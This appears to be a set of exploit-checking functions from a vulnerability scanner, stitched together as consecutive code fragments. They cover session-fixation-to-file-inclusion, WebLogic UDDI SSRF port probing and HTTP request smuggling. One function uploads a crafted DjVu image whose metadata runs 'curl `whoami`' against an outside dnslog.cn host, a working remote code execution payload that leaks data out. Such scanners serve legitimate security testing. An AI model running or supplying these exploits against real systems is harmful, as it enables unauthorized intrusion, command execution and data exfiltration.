def _verify(self):
result = {}
# print(self.url)
base_url = self.url
# print(url)
try:
logger.info('[-] Creating session..')
session = requests.Session()
self.create_session(base_url, session)
logger.info(session.cookies.get_dict())
logger.info(
'[+] Got session: {0}'.format(session.cookies.get_dict()['SESSID']))
logger.info('[-] Fixing session..')
self.fix_session(base_url, session)
logger.info('[-] Getting rand..')
rand = self.get_rand(base_url, session)
logger.info('[+] Got rand: {0}'.format(rand))
logger.info('[-] Re-breaking session..')
self.create_session(base_url, session)
logger.info('[-] Getting file..')
file_text = self.do_lfi(base_url, session, rand)
if 'root' in file_text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = base_url
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _verify(self):
result = {}
session = requests.Session()
try:
r = session.get(self.url.rstrip("/") + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.q3ddlk.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
headers = {
"User-Agent":
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Connection": "close",
"Content-Type":
"multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
"X-CSRF-Token": f"{token}",
"Accept-Encoding": "gzip, deflate"
}
flag = 'Failed to process image'
req = session.post(self.url.rstrip("/") + "/uploads/user",
data=data,
headers=headers)
if flag in req.text:
result['VerfiryInfo'] = {}
result['VerfiryInfo']['URL'] = self.url
result['VerfiryInfo']['Postdata'] = data
except Exception as e:
pass
#print(e)
return self.parse_output(result)
def ssrf(target):
# {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
proxies = None
headers = {
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', 'Connection': 'close'}
timeout = 5
ports_ssrf = '21,22,23,80,443,1521,3306,3389,8080,7001,17001'
status, ssrf_ip, results = False, '', []
try:
s = req.Session()
r_test = s.get('{}/uddiexplorer/SetupUDDIExplorer.jsp'.format(target),
headers=headers, timeout=timeout, proxies=proxies)
if r_test.status_code == 200:
regex = 'http://(.*)/uddi/uddilistener'
ip_ssrf = re.findall(regex, r_test.content)[0]
if ip_ssrf != '':
ssrf_ip = ip_ssrf.split(':')[0]
for port in ports_ssrf.split(','):
try:
url = '{}/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{}:{}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'.format(
target, ssrf_ip, port)
r = s.get(url, headers=headers,
timeout=timeout, proxies=proxies)
re_sult4 = re.findall(
'IO Exception on sendMessage', r.content)
# 如果是404页面,则说明已删除了该页面,不存在漏洞利用,结束检测
if r.status_code == 404 or len(re_sult4) != 0:
break
re_sult1 = re.findall(
'weblogic.uddi.client.structures.exception.XML_SoapException', r.content)
re_sult2 = re.findall(
'No route to host', r.content)
re_sult3 = re.findall(
'but could not connect', r.content)
if len(re_sult1) != 0 and len(re_sult2) == 0 and len(re_sult3) == 0:
results.append(port)
status = True
# 如果一个端口发生超时则跳过该端口继续:
except req.exceptions.ReadTimeout:
continue
except req.exceptions.ConnectionError:
continue
except Exception as ex:
pass
# raise(ex)
return (status, ssrf_ip, ','.join(results))
def send_cl_payload(self, url, header, payload):
"""
发送CL-CL类型检测报文
"""
sess = requests.Session()
req = requests.Request('POST', url, data=payload)
prepped = req.prepare()
prepped.headers = header
try:
resp = sess.send(prepped, verify=False, timeout=10)
if (resp.status_code == 400):
return False
else:
return True
except Exception as e:
print(e.args)
return False
def send_payload(self, url, headers={}, payload=""):
"""
通过requests预处理来发送检测http报文
:param url:检测目标url
:param headers:HTTP头部
:param payload:HTTP body
:return resp_time:响应报文的时延
"""
s = requests.Session()
req = requests.Request('POST', url, data=payload)
prepped = req.prepare()
prepped.headers = headers
resp_time = 0
try:
resp = s.send(prepped, verify=False, timeout=10)
resp_time = resp.elapsed.total_seconds()
except requests.exceptions.ReadTimeout as e:
print(e.args)
resp_time = 10
except requests.exceptions.ConnectionError as ex:
print("failed to connect")
print(ex.args)
return None
return resp_time